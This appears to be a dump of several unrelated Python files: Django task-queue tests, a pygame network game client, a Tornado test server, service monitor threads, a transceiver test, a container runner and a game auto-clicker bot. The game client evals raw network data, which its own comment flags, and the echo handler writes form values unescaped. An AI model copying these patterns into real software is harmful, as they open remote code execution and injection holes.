        assert choice == 2
        # Simulate dying in the middle of a run. ModelQueue does not handle
        # SystemExit events. The result is some tasks will be left in the
        # working state.
        raise SystemExit


def worker(counter):
    """Randomly interleave task creation and task processing to fuzz mq.run."""
    tasks = Task.objects.all()
    for num in range(10000):
        if not random.randrange(3):
            # 1-in-3: create a new task (occasionally in the 'created' state)
            if random.randrange(100):
                task = Task(data=str(next(counter)))
            else:
                status = mq.Status.created()
                task = Task(data=str(next(counter)), status=status)
            task.save()
        else:
            # otherwise: attempt to run one task, swallowing simulated failures
            try:
                one_millis = dt.timedelta(microseconds=1000)
                ten_millis = one_millis * 10
                mq.run(
                    tasks,
                    'status',
                    maybe,
                    timeout=ten_millis,
                    delay=one_millis,
                )
            except BaseException:
                pass
    # close the connection so this function can also run as a thread target
    from django.db import connection
    connection.close()


@pytest.mark.django_db
def test_run_maybe():
    """Fuzz test: after thousands of random operations, every state and every
    small attempt count should have been observed at least once."""
    tasks = Task.objects.all()
    counter = itertools.count()
    worker(counter)
    # import threading
    # threads = []
    # for num in range(8):
    #     thread = threading.Thread(target=worker, args=(counter,))
    #     thread.start()
    #     threads.append(thread)
    # for thread in threads:
    #     thread.join()
    states = co.Counter()
    attemptses = co.Counter()
    for task in tasks:
        status = mq.Status(task.status)
        states[status.state] += 1
        attemptses[status.attempts] += 1
    print()
    print('States:', sorted(states.most_common()))
    print('Attempts:', sorted(attemptses.most_common()))
    assert all(state in states for state in (1, 2, 4, 5))
    assert all(attempts in attemptses for attempts in range(5))
def raise_retry(obj):
    """Worker callback that requests a retry (attempt is not counted)."""
    nop(obj)
    raise mq.Retry(dt.timedelta(seconds=7))


@pytest.mark.django_db
def test_raise_retry():
    """mq.Retry requeues the task without incrementing the attempt counter."""
    task = Task(data=str(0))
    task.save()
    before_status = mq.Status(task.status)
    task = mq.run(Task.objects.all(), 'status', raise_retry)
    task.refresh_from_db()
    after_status = mq.Status(task.status)
    assert after_status.state == mq.State.waiting
    assert after_status.priority >= before_status.priority
    assert after_status.attempts == 0


def raise_abort(obj):
    """Worker callback that aborts the run (attempt is counted)."""
    nop(obj)
    raise mq.Abort(dt.timedelta(seconds=7))


@pytest.mark.django_db
def test_raise_abort():
    """mq.Abort requeues the task and increments the attempt counter."""
    task = Task(data=str(0))
    task.save()
    before_status = mq.Status(task.status)
    task = mq.run(Task.objects.all(), 'status', raise_abort)
    task.refresh_from_db()
    after_status = mq.Status(task.status)
    assert after_status.state == mq.State.waiting
    assert after_status.priority >= before_status.priority
    assert after_status.attempts == 1


def raise_cancel(obj):
    """Worker callback that cancels the task outright."""
    nop(obj)
    raise mq.Cancel


@pytest.mark.django_db
def test_raise_cancel():
    """mq.Cancel moves the task to the canceled state immediately."""
    task = Task(data=str(0))
    task.save()
    before_status = mq.Status(task.status)
    task = mq.run(Task.objects.all(), 'status', raise_cancel)
    task.refresh_from_db()
    after_status = mq.Status(task.status)
    assert after_status.state == mq.State.canceled
    assert after_status.priority >= before_status.priority
    assert after_status.attempts == 1
@pytest.mark.django_db
def test_tally():
    """Status.tally counts tasks per state; N tasks are created in state N."""
    result = {
        'created': 1,
        'waiting': 2,
        'working': 3,
        'finished': 4,
        'canceled': 5,
    }
    for state in mq.Status.states:
        for num in range(state):
            # e.g. mq.Status.waiting() constructs a status value in that state
            func = getattr(mq.Status, str(state))
            task = Task(data=str(int(state)), status=func())
            task.save()
    tasks = Task.objects.all()
    assert mq.Status.tally(tasks, 'status') == result
def _admin_client():
    """Create a superuser and return a test Client logged in as that user.

    Extracted to remove the identical five-line setup previously duplicated
    in every admin test below.
    """
    user = User.objects.create(username='alice', password='password')
    user.is_superuser = True
    user.is_staff = True
    user.save()
    client = Client()
    client.force_login(user)
    return client


@pytest.mark.django_db
def test_admin_list_filter():
    """The admin changelist shows all tasks and filters by queue state."""
    client = _admin_client()
    # create state*2 tasks in each state (total of 30 tasks)
    for state in mq.Status.states:
        for num in range(state * 2):
            func = getattr(mq.Status, str(state))
            task = Task(data=str(int(state)), status=func())
            task.save()
    response = client.get('/admin/www/task/')
    assert b'30 tasks' in response.content
    for state in mq.Status.states:
        url = '/admin/www/task/?status_queue={name}'.format(name=state.name)
        response = client.get(url)
        assert '{} tasks'.format(state * 2).encode() in response.content


@pytest.mark.django_db
def test_admin_add():
    """The admin add form pre-fills the status field with a value starting 220."""
    client = _admin_client()
    response = client.get('/admin/www/task/add/')
    assert b'value="220' in response.content


@pytest.mark.django_db
def test_admin_action_state():
    """Each make_status_state_<state> admin action redirects after POST."""
    client = _admin_client()
    for state in mq.Status.states:
        func = getattr(mq.Status, str(state))
        task = Task(data=str(int(state)), status=func())
        task.save()
    for state in mq.Status.states:
        action = f'make_status_state_{state}'
        args = {'action': action, '_selected_action': 1}
        response = client.post('/admin/www/task/', args)
        assert response.status_code == 302


@pytest.mark.django_db
def test_admin_action_priority():
    """The make_status_priority_now admin action redirects after POST."""
    client = _admin_client()
    for state in mq.Status.states:
        func = getattr(mq.Status, str(state))
        task = Task(data=str(int(state)), status=func())
        task.save()
    action = 'make_status_priority_now'
    args = {'action': action, '_selected_action': 1}
    response = client.post('/admin/www/task/', args)
    assert response.status_code == 302


@pytest.mark.django_db
def test_admin_action_attempts():
    """The make_status_attempts_zero admin action redirects after POST."""
    client = _admin_client()
    for state in mq.Status.states:
        func = getattr(mq.Status, str(state))
        task = Task(data=str(int(state)), status=func())
        task.save()
    action = 'make_status_attempts_zero'
    args = {'action': action, '_selected_action': 1}
    response = client.post('/admin/www/task/', args)
    assert response.status_code == 302
|
gameMapClient.py
|
import socket, threading
from pygame import *
from math import*

#TCP_IP = '10.88.214.97'
TCP_IP = '192.227.178.111'
TCP_PORT = 5005
BUFFER_SIZE = 200
running = True
screen = display.set_mode((800,600))
# shared between the main loop and the network thread (getData)
otherPlayers = {}
background = image.load('OutcastMap.png')
person = image.load("Default Person.png")
deg = 90
# playerList layout: [player name, [x, y] map position, heading in radians]
playerList = ['admin',[400,300],deg]
def getData():
    """Network thread: repeatedly send our playerList to the server and store
    the server's reply in the shared otherPlayers dict.

    Runs until the module-level 'running' flag is cleared by the main loop.
    """
    global BUFFER_SIZE
    global running
    global playerList
    global otherPlayers
    global deg
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TCP_IP, TCP_PORT))
    while running:
        # Bug fix: send/recv/eval previously sat OUTSIDE the try block, so a
        # dropped connection or malformed packet killed this thread silently.
        try:
            s.send(str(playerList).encode('utf-8'))
            # SECURITY NOTE: eval() on data received from the network executes
            # arbitrary code sent by (or injected into) the server; this should
            # be replaced with a safe format such as JSON.
            otherPlayers = eval(s.recv(BUFFER_SIZE).decode('utf-8'))
        except OSError:
            # connection lost - stop the network loop
            break
        except Exception:
            # malformed packet; keep the previous otherPlayers snapshot
            pass
    s.close()
threading.Thread(target=getData).start()

while running:
    for e in event.get():
        if e.type == QUIT:
            running = False
    #Movement and Blitting
    try:
        # show the 800x600 window of the map centred on the player
        portion = background.subsurface(Rect(playerList[1][0]-screen.get_width()//2,playerList[1][1]-screen.get_height()//2,800,600))
        screen.blit(portion,(0,0))
    except:
        # subsurface raises if the view rect leaves the map; log the position
        print(playerList)
    mx,my = mouse.get_pos()
    mb = mouse.get_pressed()
    keysPressed = key.get_pressed()
    # WASD movement, clamped so the 800x600 viewport stays inside the map
    #UP
    if keysPressed[K_w] and 300<playerList[1][1]-5:
        playerList[1][1] -= 5
    #DOWN
    if keysPressed[K_s] and playerList[1][1]+5<background.get_height()-300:
        playerList[1][1] += 5
    #LEFT
    if keysPressed[K_a] and 400<playerList[1][0]-5:
        playerList[1][0] -= 5
    #RIGHT
    if keysPressed[K_d] and playerList[1][0]+5<background.get_width()-400:
        playerList[1][0] += 5
    # face the sprite toward the mouse cursor (screen centre is at 400,300)
    length=(400-mx),(300-my)
    deg = atan2(length[0],length[1])
    length=degrees(deg)
    rotated = transform.rotate(person,(length))
    screen.blit(rotated,(screen.get_width()//2-rotated.get_width()//2,screen.get_height()//2-rotated.get_height()//2))
    #draw.circle(screen, (255,255,0), playerList[1],5)
    # draw the other connected players relative to our own position
    for p in otherPlayers:
        if p != playerList[0]:
            px,py = playerList[1]
            nx,ny = otherPlayers[p][0]
            if px-screen.get_width()//2<nx<px+screen.get_width() and py-screen.get_height()//2<ny<py+screen.get_height()//2:
                nx = nx-px +400
                ny = ny-py +300
                # NOTE(review): this reuses the LOCAL player's rotation
                # ('length') for remote players -- presumably it should use the
                # remote player's own heading from otherPlayers[p]; confirm
                # against the server's data layout.
                rotated = transform.rotate(person,(length))
                screen.blit(rotated,(nx-rotated.get_width()//2,ny-rotated.get_height()//2))
    display.flip()
quit()
|
tornado-localserver.py
|
import re
import threading
import tornado.httpserver
import tornado.ioloop
import tornado.web
import time
from authhandler import BasicAuthHandler
from authhandler import DigestAuthHandler
# Fixture page for the reload test: links near the start and near the end,
# separated by a few KB of padding so HEAD-style parsing cannot see both.
RELOAD_TEST_HTML = """\
<html>
<head><title>Title</title></head>
<body>
<a href="/mechanize">near the start</a>
<p>Now some data to prevent HEAD parsing from reading the link near
the end.
<pre>
%s</pre>
<a href="/mechanize">near the end</a>
</body>
</html>""" % (("0123456789ABCDEF"*4+"\n")*61)

# Fixture page exercised by the Referer-header tests.
REFERER_TEST_HTML = """\
<html>
<head>
<title>mechanize Referer (sic) test page</title>
</head>
<body>
<p>This page exists to test the Referer functionality of <a href="/mechanize">mechanize</a>.
<p><a href="/cgi-bin/cookietest.cgi">Here</a> is a link to a page that displays the Referer header.
</body>
</html>"""
def html(title=None, extra_content=""):
    """Build the standard test page, optionally overriding the <title>.

    :param title: when not None, substituted into the page's <title> element
    :param extra_content: text placed inside the page's single anchor
    :return: the assembled HTML string
    """
    page = """\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>mechanize</title>
</head>
<body><a href="http://sourceforge.net/">
%s</a>
</body>
</html>
""" % extra_content
    if title is None:
        return page
    return re.sub("<title>(.*)</title>", "<title>%s</title>" % title, page)
class MainHandler(tornado.web.RequestHandler):
    """Serve the default mechanize test page at the site root."""

    def get(self):
        self.write(html('mechanize'))
class RobotHandler(tornado.web.RequestHandler):
    """Serve robots.txt and the robots/norobots fixture pages as plain text."""

    _RESPONSES = {
        'robots.txt': "User-Agent: *\nDisallow: /norobots",
        'robots': "Hello, robots.",
        'norobots': "Hello, non-robots.",
    }

    def get(self, page):
        self.set_header('Content-Type', 'text/plain')
        body = self._RESPONSES.get(page)
        if body is None:
            body = page + ": I don't understand!"
        self.write(body)
class MechanizeHandler(tornado.web.RequestHandler):
    """Serve the mechanize landing page and the forms example fixture."""

    def get(self, page):
        if page == '':
            HTML = html()
        elif page == 'example.html':
            import os.path
            # Bug fix: the file handle from open(...).read() was never closed;
            # use a context manager so it is released deterministically.
            with open(os.path.join("..", "examples", "forms", "example.html")) as f:
                HTML = f.read()
        else:
            HTML = 'Wrong!'
        self.write(HTML)
class TestFixturesHandler(tornado.web.RequestHandler):
    """Serve the static fixture pages used by the functional test-suite."""

    def get(self, page):
        if page == '':
            HTML = html("Python bits", extra_content="GeneralFAQ.html")
        elif page == 'cctest2.txt':
            self.set_header('Content-Type', 'text/plain')
            HTML = "Hello ClientCookie functional test suite."
        elif page == 'referertest.html':
            HTML = REFERER_TEST_HTML
        elif page == 'mechanize_reload_test.html':
            HTML = RELOAD_TEST_HTML
        else:
            HTML = "Wrong!"
        self.write(HTML)
class CGIHandler(tornado.web.RequestHandler):
    # TODO(Samba): Move this code into Tornado Templates
    # There's a time for intelligence, and that's later.
    # ...I need a better motto.
    def post(self, page):
        """Emulate the legacy CGI endpoints: 'cookietest' echoes cookies, the
        Referer header and POST parameters; 'echo' echoes POST parameters only.
        """
        if page == 'cookietest':
            import os
            import urllib.parse
            from html import escape
            from time import time, localtime
            from xml.sax import saxutils
            # cookie expiry one calendar year in the future
            year_plus_one = localtime(time())[0] + 1
            expires = "expires=09-Nov-%d 23:12:40 GMT" % (year_plus_one,)
            cookies = self.cookies
            self.set_header("Content-Type", "text/html")
            self.add_header("Set-Cookie", "foo=bar; {}".format(expires))
            self.add_header("Set-Cookie", "sessioncookie=spam")
            HTML = """\
<html><head><title>Cookies and form submission parameters</title>
"""
            # NOTE(review): tornado's get_argument() raises a 400 error when
            # the argument is absent -- presumably this should be
            # get_argument("refresh", None); confirm against callers.
            refresh_value = self.get_argument("refresh")
            if refresh_value:
                HTML += '<meta http-equiv="refresh" content=%s>' % (
                    saxutils.quoteattr(urllib.parse.unquote_plus(refresh_value)))
            elif "foo" not in cookies:
                HTML += '<meta http-equiv="refresh" content="5">'
            HTML += """</head>
<p>Received cookies:</p>
<pre>
"""
            HTML += ', '.join(c for c in cookies)
            HTML += "\n</pre>\n"
            if "foo" in cookies:
                HTML += "<p>Your browser supports cookies!</p>\n"
            if "sessioncookie" in cookies:
                HTML += "<p>Received session cookie</p>\n"
            HTML += """<p>Referer:</p>
<pre>
"""
            # NOTE(review): tornado requests expose headers via
            # self.request.headers.get(...); get_header() looks like a
            # mechanize-era API and would raise AttributeError here -- verify.
            HTML += self.request.get_header('Referer')
            HTML += """\n</pre>
<p>Received parameters:</p>
<pre>
"""
            # only keep arguments that decoded to at least one value
            form = {k: self.get_arguments(k) for k in self.request.arguments if self.get_arguments(k)}
            for k in form:
                v = form.get(k)
                if isinstance(v, list):
                    vs = []
                    for item in v:
                        vs.append(item)
                    text = ', '.join(vs)
                elif not v:
                    text = "None"
                else:
                    text = v
                HTML += "%s: %s\n" % (escape(k), escape(text))
            HTML += "</pre></html>"
        elif page == 'echo':
            from html import escape
            self.set_header("Content-Type", "text/html")
            HTML = "<html><head><title>Form submission parameters</title></head>\n"
            form = {k: self.get_arguments(k) for k in self.request.arguments if self.get_arguments(k)}
            HTML += "<p>Received parameters:</p>\n"
            HTML += "<pre>\n"
            for k in form:
                v = form.get(k)
                if isinstance(v, list):
                    vs = []
                    for item in v:
                        vs.append(item)
                    text = ', '.join(vs)
                else:
                    text = v
                # NOTE(review): only the key is escaped here; the value is
                # written raw, unlike the cookietest branch -- confirm intended.
                HTML += "%s: %s\n" % (escape(k), text)
            HTML += "</pre></html>"
        else:
            HTML = "Wrong!"
        self.write(HTML)
def start_tornado(*args, **kwargs):
    """Build the test web application, bind it to port 8878, and run the
    Tornado IO loop until it is stopped (see stop_tornado)."""
    routes = [
        (r"/", MainHandler),
        (r"/mechanize/?([\w.]*)", MechanizeHandler),
        (r"/(.*robot.*)", RobotHandler),
        (r"/test_fixtures/?([\w.]*)", TestFixturesHandler),
        (r"/redirected", tornado.web.RedirectHandler, {"url": "/"}),
        (r"/cgi-bin/(.*)\.cgi", CGIHandler),
        (r"/basic_auth", BasicAuthHandler),
        (r"/digest_auth", DigestAuthHandler),
    ]
    server = tornado.httpserver.HTTPServer(tornado.web.Application(routes))
    server.listen(8878)
    print("Starting Tornado")
    tornado.ioloop.IOLoop.instance().start()
    print("Tornado finished")
def stop_tornado():
    """Ask the running IO loop to stop, from any thread, via add_callback."""
    loop = tornado.ioloop.IOLoop.instance()
    loop.add_callback(lambda l: l.stop(), loop)
    print("Asked Tornado to exit")
def main():
    """Run the test server in a background thread for 60 seconds, then stop
    it and wait for the server thread to finish."""
    server_thread = threading.Thread(target=start_tornado)
    server_thread.start()
    time.sleep(60)
    stop_tornado()
    server_thread.join()
# Entry point: run the throwaway Tornado test server when executed directly.
if __name__ == "__main__":
    main()
|
monitors.py
|
"""
Common threading utils for anchore engine services.
"""
import time
import threading
from anchore_engine.subsys import logger
# generic monitor_func implementation
# Module-level state shared by monitor() and default_monitor_func():
click = 0              # startup-delay counter; counts up to 5 before real work begins
running = False        # True while default_monitor_func's body is executing
last_run = 0           # epoch timestamp of the last completed run (for kick_timer gating)
monitor_thread = None  # the single thread running default_monitor_func, managed by monitor()
def default_monitor_func(**kwargs):
    """
    Generic monitor thread function for invoking tasks defined in a monitor dict.

    Expected kwargs:
        monitors: dict of monitor-name -> config dict with keys such as
            'handler', 'args', 'cycle_timer', 'min_cycle_timer',
            'max_cycle_timer', 'initialized' (and optionally 'enabled').
        monitor_threads: dict of monitor-name -> threading.Thread
        servicename: service name used in log messages
        kick_timer: minimum seconds between successive runs
        cycle_timers: optional per-monitor cycle-timer overrides from config

    :param kwargs: see above
    :return: True (always; failures are logged, never raised)
    """
    global click, running, last_run

    my_monitors = kwargs['monitors']
    monitor_threads = kwargs['monitor_threads']
    servicename = kwargs['servicename']

    # Delay the first real run by ~5 invocations to let the service settle.
    if click < 5:
        click = click + 1
        logger.debug("service ("+str(servicename)+") starting in: " + str(5 - click))
        return True

    # Rate-limit: skip this invocation until kick_timer seconds have elapsed.
    if round(time.time() - last_run) < kwargs['kick_timer']:
        logger.spew(
            "timer hasn't kicked yet: " + str(round(time.time() - last_run)) + " : " + str(kwargs['kick_timer']))
        return True

    try:
        running = True
        last_run = time.time()

        # Handle setting the cycle timers based on configuration (first run only).
        for monitor_name in list(my_monitors.keys()):
            if not my_monitors[monitor_name]['initialized']:
                # first time
                if 'cycle_timers' in kwargs and monitor_name in kwargs['cycle_timers']:
                    try:
                        the_cycle_timer = my_monitors[monitor_name]['cycle_timer']
                        min_cycle_timer = my_monitors[monitor_name]['min_cycle_timer']
                        max_cycle_timer = my_monitors[monitor_name]['max_cycle_timer']

                        config_cycle_timer = int(kwargs['cycle_timers'][monitor_name])
                        if config_cycle_timer < 0:
                            # Negative value: force the timer, bypassing min/max clamping.
                            the_cycle_timer = abs(int(config_cycle_timer))
                        elif config_cycle_timer == 0:
                            # Zero disables the monitor entirely.
                            my_monitors[monitor_name]['enabled'] = False
                            logger.debug("monitor '{}' has been explicitly disabled in config".format(monitor_name))
                        elif config_cycle_timer < min_cycle_timer:
                            logger.warn("configured cycle timer for handler ("+str(monitor_name)+") is less than the allowed min ("+str(min_cycle_timer)+") - using allowed min")
                            the_cycle_timer = min_cycle_timer
                        elif config_cycle_timer > max_cycle_timer:
                            logger.warn("configured cycle timer for handler ("+str(monitor_name)+") is greater than the allowed max ("+str(max_cycle_timer)+") - using allowed max")
                            the_cycle_timer = max_cycle_timer
                        else:
                            the_cycle_timer = config_cycle_timer

                        my_monitors[monitor_name]['cycle_timer'] = the_cycle_timer
                    except Exception as err:
                        logger.warn("exception setting custom cycle timer for handler ("+str(monitor_name)+") - using default")

                my_monitors[monitor_name]['initialized'] = True

        # Handle the thread (re)starters here.
        for monitor_name in list(my_monitors.keys()):
            if my_monitors[monitor_name].get('enabled', True):
                start_thread = False
                if monitor_name not in monitor_threads:
                    start_thread = True
                else:
                    # BUG FIX: Thread.isAlive() was removed in Python 3.9;
                    # use the is_alive() method instead.
                    if not monitor_threads[monitor_name].is_alive():
                        logger.debug("thread stopped - restarting: " + str(monitor_name))
                        monitor_threads[monitor_name].join()
                        start_thread = True

                if start_thread:
                    monitor_threads[monitor_name] = threading.Thread(target=my_monitors[monitor_name]['handler'], args=my_monitors[monitor_name]['args'], kwargs={'mythread': my_monitors[monitor_name]})
                    logger.debug("starting up monitor_thread: " + str(monitor_name))
                    monitor_threads[monitor_name].start()

    except Exception as err:
        logger.error(str(err))
    finally:
        running = False

    return True
def monitor(*args, **kwargs):
    """
    (Re)start the module-level monitor thread running default_monitor_func.

    A new thread is started when none exists or the previous one has
    finished; otherwise the call is a no-op. All kwargs are forwarded to
    default_monitor_func. Exceptions are logged, never raised.
    """
    global monitor_thread
    try:
        donew = False
        if monitor_thread:
            # BUG FIX: Thread.isAlive() was removed in Python 3.9; use is_alive().
            if monitor_thread.is_alive():
                logger.spew("MON: thread still running")
            else:
                logger.spew("MON: thread stopped running")
                donew = True
                monitor_thread.join()
                logger.spew("MON: thread joined: isAlive=" + str(monitor_thread.is_alive()))
        else:
            logger.spew("MON: no thread")
            donew = True

        if donew:
            logger.spew("MON: starting")
            monitor_thread = threading.Thread(target=default_monitor_func, kwargs=kwargs)
            monitor_thread.start()
        else:
            logger.spew("MON: skipping")
    except Exception as err:
        logger.warn("MON thread start exception: " + str(err))
|
test_socket_transceiver.py
|
from collections import deque
from typing import Deque, Optional, Tuple, Union
from enum import Enum
import random
from threading import Thread
from time import sleep
from pisat.comm.transceiver import TransceiverBase
from pisat.comm.transceiver import SocketTransceiver
from pisat.comm.transceiver import CommSocket
class TestTransceiver(TransceiverBase):
    """Fake transceiver used to exercise SocketTransceiver without hardware.

    Incoming data is simulated by a background thread (update_data) that
    appends DATA to an internal receive buffer once a second; outgoing data
    is captured in _buf_send for later inspection.
    """

    class Setting(Enum):
        BYTES_PACKET_MAX = 64

    # Payload injected into the receive buffer by update_data().
    DATA = b"abcdefghijklmn"
    # Candidate source addresses (recv_raw currently hard-codes address 1).
    ADDRESS = [1, 2, 3, 4, 5]

    def __init__(self,
                 address: Tuple[int],
                 name: Optional[str] = None) -> None:
        # No real hardware handler; the base class just records the metadata.
        super().__init__(handler=None, address=address, name=name)
        # Simulated incoming packets, newest on the left.
        self._buf: Deque[bytes] = deque()
        # Captured outgoing packets, newest on the left.
        self._buf_send: Deque[bytes] = deque()

    def update_data(self):
        """Start a thread that feeds DATA into the receive buffer once per
        second, stopping after ~10 iterations."""
        def update():
            time = 0
            while True:
                self._buf.appendleft(self.DATA)
                sleep(1)
                time += 1
                if time > 10:
                    break
            print("end update_data")
        thread = Thread(target=update)
        thread.start()

    def recv_raw(self) -> Tuple[Tuple[int], bytes]:
        """Pop the oldest buffered packet.

        Returns ((addr,), data) when data is available, or an empty tuple
        when the buffer is empty (note: the empty-tuple case does not match
        the annotated return type).
        """
        if len(self._buf) > 0:
            addr = 1
            # addr = random.choice(self.ADDRESS)
            data = self._buf.pop()
            return (addr, ), data
        else:
            return ()

    def send_raw(self, address: Tuple[int], data: Union[bytes, bytearray]) -> None:
        """Record an outgoing packet, prefixed with its target address digit."""
        address_str = str(address[0])
        self._buf_send.appendleft(address_str.encode() + bytes(data))
def main_1():
    """Exercise periodic send/recv on socket_1 against the fake transceiver
    for roughly 11 seconds, then dump what was sent."""
    transceiver = TestTransceiver((0,))
    multiplexer = SocketTransceiver(transceiver)
    socket_1 = multiplexer.create_socket((1, ), name="socket_1")
    socket_2 = multiplexer.create_socket((2, ), name="socket_2")

    transceiver.update_data()
    multiplexer.observe()

    elapsed = 0
    while elapsed <= 11:
        socket_1.send(b'hello' * 20)
        sleep(0.5)
        elapsed += 0.5
        print(socket_1.recv(10))

    multiplexer.stop_observe()
    print(transceiver._buf_send)
def main_2():
    """Send one burst from each of two sockets and print what reached the
    underlying fake transceiver."""
    transceiver = TestTransceiver((0,))
    multiplexer = SocketTransceiver(transceiver)
    socket_1 = multiplexer.create_socket((1, ), name="socket_1")
    socket_2 = multiplexer.create_socket((2, ), name="socket_2")

    multiplexer.observe()
    print("go")

    socket_1.send(b"hello world " * 10)
    socket_2.send(b"bye world " * 10)
    sleep(0.01)

    print(transceiver._buf_send)
    for packet in transceiver._buf_send:
        print(len(packet))

    multiplexer.stop_observe()
# Run the two-socket send test by default when executed as a script.
if __name__ == "__main__":
    main_2()
|
ShifterRunner.py
|
import os
from threading import Thread
from subprocess import Popen, PIPE
from select import select
class ShifterRunner:
    """
    This class provides the container interface for Docker via the
    ``myshifter`` command-line tool.
    """

    def __init__(self, logger=None):
        """
        Inputs: optional logger used to forward container output lines.
        """
        self.logger = logger
        self.containers = []  # Popen handles of started containers
        self.threads = []     # reader threads draining container output

    def _readio(self, p, job_id, queues):
        """Drain stdout/stderr of process *p*, forwarding each line to the
        logger (stderr lines flagged as errors). Runs until the process has
        exited and one final drain pass completed, then posts a
        ['finished', job_id, None] message on every queue."""
        cont = True
        last = False
        while cont:
            rlist = [p.stdout, p.stderr]
            readable = select(rlist, [], [], 1)[0]
            for f in readable:
                # Lines arriving on stderr are flagged as errors.
                is_error = 1 if f == p.stderr else 0
                line = f.readline().decode('utf-8')
                if len(line) > 0:
                    try:
                        self.logger.log_lines([{'line': line, 'is_error': is_error}])
                    except Exception as e:
                        print(e)
                        continue
            if last:
                cont = False
            if p.poll() is not None:
                # Process exited; allow one more select pass to drain pipes.
                last = True
        p.wait()
        for q in queues:
            q.put(['finished', job_id, None])

    def get_image(self, image):
        """Look up *image* with shifter, pulling it first when missing.

        :return: the resolved image id
        :raises RuntimeError: if the image cannot be resolved after a pull
        """
        lookcmd = ['myshifter', 'lookup', image]
        proc = Popen(lookcmd, stdout=PIPE, stderr=PIPE)
        stdout, stderr = proc.communicate()
        image_id = stdout.decode('utf-8').rsplit()
        if image_id == [] or image_id is None:
            # Not present yet: pull, then look up again.
            cmd = ['myshifter', 'pull', image]
            proc = Popen(cmd, stdout=PIPE, stderr=PIPE)
            stdout, stderr = proc.communicate()
            proc = Popen(lookcmd, stdout=PIPE, stderr=PIPE)
            stdout, stderr = proc.communicate()
            image_id = stdout.decode('utf-8').rsplit()
        if not image_id:
            # Previously this fell through to an opaque IndexError; fail clearly.
            raise RuntimeError('unable to resolve shifter image %s' % image)
        return image_id[0]

    def run(self, job_id, image, env, vols, labels, queues, cgroup=None):
        """Start *image* with the given env vars and volume binds; a reader
        thread forwards its output. Returns the Popen handle."""
        self.get_image(image)
        cmd = [
            'myshifter',
            'run',
            '--image=%s' % (image)
        ]
        # TODO: Do something with the labels
        for hd in vols.keys():
            cmd.extend(['--volume', '%s:%s' % (hd, vols[hd]['bind'])])
        # BUG FIX: copy the environment instead of aliasing os.environ, which
        # previously leaked job-specific variables into this process's env.
        newenv = os.environ.copy()
        for e in env.keys():
            newenv[e] = env[e]
        proc = Popen(cmd, bufsize=0, stdout=PIPE, stderr=PIPE, env=newenv)
        out = Thread(target=self._readio, args=[proc, job_id, queues])
        self.threads.append(out)
        out.start()
        self.containers.append(proc)
        return proc

    def remove(self, c):
        """Kill the container process *c* (a Popen handle)."""
        c.kill()
|
main.py
|
from cv2 import cv2
import os
from time import time, sleep
import pydirectinput, pyautogui, threading
from ekranyakala import ekranYakala
from vision import Vision
# from detection import Detection
os.chdir(os.path.dirname(os.path.abspath(__file__)))

# The game window's title changes periodically, so every known title variant
# is listed here and tried in turn. (Titles are matched verbatim.)
baslik = ("Rohan2 - İlk Günkü Tutku ile! | Discord : https://discord.gg/sGJhpvG",
          "Rohan2 - Tüm Teçhizatlarını Son Seviyeye Getir! | Forum: https://board.rohan2.global",
          "Rohan2 - Amansız Patronları Yen! | Wiki: https://wiki.rohan2.global",
          "Rohan2 - Eğlenerek Zevkle Vakit Geçir! | https://rohan2.global",
          "Rohan2 - Farkı Hisset! | Anasayfa: https://rohan2.global")

# Loop over the titles until one matches an open window.
for i in baslik:
    try:
        wincap = ekranYakala(i)
    except Exception:  # BUG FIX: was a bare except (also caught KeyboardInterrupt)
        continue
    else:
        # BUG FIX: stop at the first successful capture; the loop previously
        # continued and re-tried (and could overwrite wincap with) every
        # remaining title.
        break
# NOTE(review): if no title matches, wincap stays undefined and the main loop
# below raises NameError — confirm this is the intended failure mode.

# Cascade model file. BUG FIX: the path is relative to the script directory
# (set by os.chdir above); the previous absolute path "/cascade/cascade.xml"
# pointed at the filesystem root and silently loaded an empty classifier.
cascade = cv2.CascadeClassifier("cascade/cascade.xml")
vision = Vision(None)

loop_time = time()
metine_vur = False  # True while a worker thread is handling a detection
s = 1               # counter of successful detections
s1 = 0              # counter of misses
kontrol = 0         # consecutive-miss counter used to trigger a reposition
def metinevur(rectangles):
    """Click the first detected metin stone, or reposition the camera and
    character when nothing was detected, then clear the busy flag.

    :param rectangles: detection rectangles from the cascade classifier
    """
    global metine_vur
    global kontrol
    global s, s1
    if len(rectangles) > 0:
        # Convert detections to click points and translate the first one
        # into screen coordinates of the captured window.
        targets = vision.get_click_points(rectangles)
        target = wincap.get_screen_position(targets[0])
        pyautogui.moveTo(x=target[0], y=target[1])
        sleep(0.4)
        pyautogui.click(x=target[0], y=target[1])
        print(s,"Metin Bulundu")
        s += 1
        # Adjust this sleep (seconds) to match your stone-breaking speed.
        sleep(17)
    else:
        s1 += 1
        print(s1, "Bulunamadı")
        # Translation of the note below: if no object is found in-game,
        # press 'e' 6 times to rotate the view and 'f' to widen the camera;
        # after 3 consecutive misses press 'w' 3 times to walk forward —
        # i.e. change position. Tweak per server; if key presses don't
        # register in-game, try running the program as administrator.
        """
        - Oyunda objeyi bulamazsa 6 defa 'e' tuşuna basar. yani ekranı döndürür.
        'f' ile kamerayı genişletir.
        - 3 defa bulamazsa 3 kez 'w'e basar ve ileri gider.
        Yani kısacası burada yaptığımız işlem konum değiştirmek.
        Oynadığınız servere göre değiştirip geliştirebilirsiniz.
        Eğer oyun içinde tuş basmıyorsa programı yönetici olarak çalıştırıp deneyin.
        Yine olmazsa yapacak bişey yok :) yada ben bulamadım...
        """
        pydirectinput.press("e", presses=6)
        pydirectinput.press("f", presses=10)
        kontrol += 1
        if kontrol >= 3:
            print("Kontrol", kontrol)
            pydirectinput.press("w", presses=3)
            kontrol = 0
    # Allow the main loop to spawn a new worker for the next detection.
    metine_vur = False
# Main capture/detect loop: grab a frame, run the cascade, display the
# annotated image, and hand detections to a worker thread.
while True:
    ss = wincap.get_screenshot()
    rectangles = cascade.detectMultiScale(ss)
    detection_image = vision.draw_rectangles(ss, rectangles)
    cv2.imshow('Goruntu', detection_image)
    if not metine_vur:
        # Translation of the note below: the True/False flag exists because
        # this loop runs continuously — we only want to enter this branch
        # (and spawn a worker) while no worker is already running.
        """
        True, False kullanmamızın sebebi,
        Program sürekli döngüde kalacağı için,
        sadece 'false' durumlarda bu koşula girmesini istiyoruz.
        """
        metine_vur = True
        thrd = threading.Thread(target=metinevur, args=(rectangles,))
        thrd.start()
